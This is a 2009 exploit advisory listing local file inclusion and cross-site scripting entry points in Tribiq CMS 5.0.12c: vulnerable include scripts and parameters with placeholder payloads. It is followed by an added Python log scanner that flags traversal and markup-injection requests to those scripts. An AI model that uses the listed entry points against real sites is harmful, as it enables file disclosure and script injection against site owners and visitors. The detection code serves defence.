Tribiq CMS version 5.0.12c suffers from cross-site scripting and local file inclusion vulnerabilities.
CraCkEr - The Crack of Eternal Might
From The Ashes and Dust Rises An Unimaginable crack....

[ Local File Include ] [ XSS ]

Author           : CraCkEr
Script           : Tribiq CMS 5.0.12c
Download         : sourceforge.net
Method           : GET
Critical         : High
Impact           : system information
Register Globals : OFF
DALnet #crackers

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Exploit URLs
[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/masthead.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/toppanel.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[LFI]
[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errordisplay=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errormessage=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[title]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threadlastpost]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[replies]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threads]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[description]=[XSS]
http://localhost/path/tb/common/tb_foot.inc.php?tbFootNonStandardFooter=[XSS]
Greets:
rd0, The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
© CraCkEr 2009
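
The script and parameter names listed under [LFI] and [XSS] above can be used to review web server logs for direct requests to these include files. The following Python code is an added example, not part of the original advisory or of Tribiq CMS; the combined log format, the sample lines and client addresses, and the value heuristics are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script basename -> parameter names listed in the advisory above.
WATCHED = {
    "masthead.inc.php": {"template_path"},
    "toppanel.inc.php": {"template_path"},
    "header.inc.php": {"template_path"},
    "nlarlist_content.inc.php": {"use_template_family"},
    "contact.inc.php": {"template_path", "errordisplay", "errormessage"},
    "forum.inc.php": {"forum_summary"},
    "tb_foot.inc.php": {"tbFootNonStandardFooter"},
}
# Heuristic value markers (assumptions; tune for your environment).
TRAVERSAL = re.compile(r"\.\.[/\\]|\x00|^/|^[a-z]+://", re.I)
MARKUP = re.compile(r"[<>\"']|javascript:", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines in combined log format, not real traffic
    '203.0.113.7 - - [01/Jan/2009:10:00:00 +0000] "GET /path/templates/mytribiqsite/tribiq-CL-9000/includes/masthead.inc.php?template_path=..%2F..%2Fx HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2009:10:00:05 +0000] "GET /path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary%5Btitle%5D=%3Cb%3Et HTTP/1.1" 200 300',
    '198.51.100.4 - - [01/Jan/2009:10:01:00 +0000] "GET /path/index.php?page=1 HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Jan/2009:10:02:00 +0000] "GET /path/tb/common/tb_foot.inc.php?tbFootNonStandardFooter=1 HTTP/1.1" 200 100',
]

def classify(line):
    """Return (client, script, param, verdict) for a watched request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    script = url.path.rsplit("/", 1)[-1]
    params = WATCHED.get(script, ())
    for name, value in parse_qsl(url.query, keep_blank_values=True):  # percent-decodes
        if name.split("[", 1)[0] not in params:  # forum_summary[title] -> forum_summary
            continue
        if TRAVERSAL.search(value):
            return client, script, name, "path-traversal"
        if MARKUP.search(value):
            return client, script, name, "markup-injection"
        return client, script, name, "direct-access"
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Matching is on the script basename only, so common names such as header.inc.php may also match other applications on the same host; narrow the path check if that produces noise.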